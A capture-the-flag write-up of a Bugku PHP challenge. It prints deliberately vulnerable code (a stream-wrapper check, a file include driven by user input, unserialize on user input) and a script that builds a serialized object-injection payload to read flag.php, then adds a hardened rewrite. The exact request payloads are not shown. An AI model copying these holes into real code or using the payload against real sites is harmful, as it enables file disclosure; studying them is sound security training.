http://123.206.87.240:8006/test1/ After opening the challenge, the first step is to look at the page source:

you are not the number of bugku !

```html
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
    echo "hello admin!<br>";
    include($file); //hint.php
}else{
    echo "you are not admin ! ";
}
-->
```

Based on the source, modify the POST request; the response is a base64-encoded string. After decoding it, try modifying the POST again, and after base64-decoding the result we get the following code:

```php
<?php
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
    echo "hello friend!<br>";
    if(preg_match("/flag/",$file)){
        echo "不能现在就给你flag哦";
        exit();
    }else{
        include($file);
        $password = unserialize($password);
        echo $password;
    }
}else{
    echo "you are not the number of bugku ! ";
}
?>
<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
    echo "hello admin!<br>";
    include($file); //hint.php
}else{
    echo "you are not admin ! ";
}
-->
```

Download SourceLeakHacker-master; SourceLeakHacker is a sensitive-directory scanning tool. The entries marked with a green 200 are paths that can be accessed successfully, i.e. the sensitive paths the scan found. flag.php is among them, so modify the earlier request again, which gives:
Complete the Flag class obtained earlier:

```php
<?php
class Flag{//flag.php
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
            return ("good");
        }
    }
}
$o = new Flag();
$o->file="flag.php";
$o->__tostring();
echo serialize($o);
?>
```

Serialization: serialize() returns a string containing a byte-stream representation of the value, which can be stored anywhere. This is useful for storing or passing PHP values around without losing their type and structure. The serialized forms of the basic types are:

String: s:size:value;
Integer: i:value;
Boolean: b:value; (does not store "true" or "false", but stores 1 or 0)

Running the script gives the result: the serialized content for flag.php. Modify the request once more with it, and after submitting we get the flag. Finally the flag is obtained.
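As an added example (not part of this writeup or of the challenge's own code), here is a hardened version of the same index.php in which none of the three steps above works: the token is compared directly instead of being passed to file_get_contents(), include() only ever sees an allowlisted page name, and the password is parsed as JSON rather than unserialized. The ./pages directory and the 'hint' page name are assumptions.

```php
<?php
// Added example, not the challenge's code: a hardened rewrite of index.php.
// Assumptions: includable pages live under ./pages and are listed in ALLOWED_PAGES.
declare(strict_types=1);

const ALLOWED_PAGES = ['hint' => __DIR__ . '/pages/hint.php'];

// Compare the parameter value itself. file_get_contents($txt) on client input
// opens whatever stream wrapper the client names, so the client controls the check.
function check_token(string $txt): bool
{
    return hash_equals('welcome to the bugkuctf', $txt);
}

// Map a short name to a fixed path; include() never sees a client-supplied path,
// so it can no longer be pointed at arbitrary files or at a wrapper that leaks source.
function resolve_page(string $name): ?string
{
    return ALLOWED_PAGES[$name] ?? null;
}

// Read the password from a data-only format. unserialize() on client input
// instantiates whatever class the string names, and a class with __toString()
// or __destruct() (like Flag above) then runs its logic on client-chosen fields.
function parse_password(string $raw): ?string
{
    $data = json_decode($raw, true);
    return (is_array($data) && isset($data['password']) && is_string($data['password']))
        ? $data['password']
        : null;
}
// If legacy serialized input must still be accepted, at least forbid objects:
//   unserialize($raw, ['allowed_classes' => false]);

$txt      = $_GET['txt'] ?? '';
$file     = $_GET['file'] ?? '';
$password = $_GET['password'] ?? '';

if (!check_token($txt)) {
    echo 'you are not the number of bugku ! ';
    exit();
}
$page = resolve_page($file);
if ($page === null) {
    http_response_code(404);
    exit();
}
echo 'hello friend!<br>';
include $page;
$pw = parse_password($password);
echo $pw === null ? 'invalid password format' : htmlspecialchars($pw, ENT_QUOTES, 'UTF-8');
```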